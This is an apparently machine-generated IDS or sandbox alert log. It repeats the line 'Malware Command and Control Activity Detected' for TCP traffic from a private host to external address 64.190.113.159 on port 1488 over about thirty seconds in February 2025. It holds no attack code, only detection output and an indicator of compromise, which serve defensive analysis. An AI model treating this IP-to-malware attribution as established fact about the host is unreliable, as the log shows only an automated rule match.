                                2025-02-22T02:33:58.550841+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:58.658259+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:58.767299+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:58.876720+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:58.986055+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:59.095453+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:59.204958+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:59.314224+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:59.423561+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:59.532962+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:59.644574+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:59.752594+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:59.861388+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:59.970572+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:00.079907+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:00.190754+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:00.298640+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:00.410989+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:00.517423+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:00.626723+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:00.736149+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:00.845524+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:00.955041+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:01.064367+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:01.173581+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:01.282926+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:01.393541+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:01.501943+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:01.611230+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:01.720435+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:01.831114+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:01.970205+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:02.064703+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:02.180170+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:02.297153+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:02.392318+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:02.501684+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:02.611053+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:02.720546+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:02.829928+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:02.939226+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:03.048590+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:03.157910+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:03.267297+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:03.376755+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:03.486080+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:03.595451+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:03.705520+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:03.814227+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:03.923573+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:04.032954+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:04.142409+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:04.252517+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:04.361354+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:04.471086+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:04.579946+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:04.690684+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:04.908015+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:05.017382+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:05.126744+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:05.236077+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:05.345439+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:05.454810+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:05.564221+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:05.673870+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:05.783395+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:05.892383+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:06.002532+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:06.111082+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:06.220502+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:06.329807+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:06.439235+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:06.548717+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:06.657962+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:06.767599+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:06.876675+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:06.986175+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:07.095439+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:07.205601+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:07.314189+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:07.423643+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:07.532914+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:07.642354+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:07.751721+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:07.861123+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:07.972508+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:08.079799+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:08.189241+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:08.298587+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:08.408510+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:08.517538+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:08.626722+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:08.736054+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:08.845678+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:08.954806+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:09.064191+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:09.173808+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:09.283065+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:09.392301+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:09.501749+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:09.611092+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:09.720514+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:09.829904+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:09.940512+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:10.048610+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:10.160510+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:10.268512+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:10.376729+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:10.488509+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:10.595437+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:10.704942+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:10.814384+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:10.923563+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:11.032952+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:11.142406+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:11.251815+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:11.361172+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:11.470539+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:11.580649+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:11.692443+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:11.800527+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:11.908550+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:12.017581+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:12.128533+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:12.236528+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:12.348525+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:12.456547+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:12.564536+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:12.673688+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:12.783177+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:12.892491+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:13.001760+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:13.111176+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:13.220581+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:13.329916+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:13.439278+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:13.551444+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:13.660539+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:13.767353+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:13.876842+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:13.986083+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:14.096577+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:14.204946+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:14.316539+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:14.423597+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:14.532977+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:14.642543+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:14.751746+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:14.861143+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:14.970491+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:15.079951+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:15.189270+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:15.298779+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:15.407963+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:15.517383+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:15.628541+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:15.736402+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:15.846530+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:15.956653+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:16.087831+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:16.408632+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:16.517351+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:16.626707+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:16.736810+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:16.845467+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:16.954866+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:17.064389+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:17.173620+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:17.283101+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:17.392447+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:17.501782+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:17.612520+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:17.720538+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:17.830760+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:17.940532+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:18.048875+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:18.160521+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:18.268528+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:18.380533+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:18.595578+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:18.595578+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:18.704982+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:18.850536+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:18.955204+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:19.064237+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:19.173591+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:19.282973+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:19.392300+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:19.501702+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:19.612527+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:19.720532+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:19.829815+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:19.940535+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:20.048629+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:20.160526+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:20.268539+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:20.380641+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:20.488542+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:20.595467+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:20.704912+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:20.814313+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:20.923630+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:21.033033+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:21.142397+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:21.251772+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:21.361061+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:21.470434+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:21.692537+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:21.692537+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:21.798614+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:21.908548+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:22.020544+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:22.128555+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:22.236773+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:22.348557+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:22.456627+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:22.564217+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:22.673598+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:22.783012+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:22.894839+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:23.002147+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:23.111154+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:23.220522+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:23.329868+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:23.439381+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:23.548594+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:23.660542+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:23.768551+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:23.876828+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:23.988555+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:24.095566+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:24.204959+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:24.314225+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:24.424550+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:24.536562+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:24.644329+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:24.752851+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:24.861203+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:25.314322+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:25.314322+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:25.423611+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:25.533014+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:25.644546+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:25.751769+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:25.863248+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:25.971369+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:26.079892+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:26.190572+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:26.298890+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:26.411077+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:26.517384+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:26.626974+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:26.736125+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:26.845630+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:26.954980+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:27.064650+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:27.173646+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:27.283138+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:27.402928+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:27.501755+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:27.614835+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:27.722893+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:27.836740+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
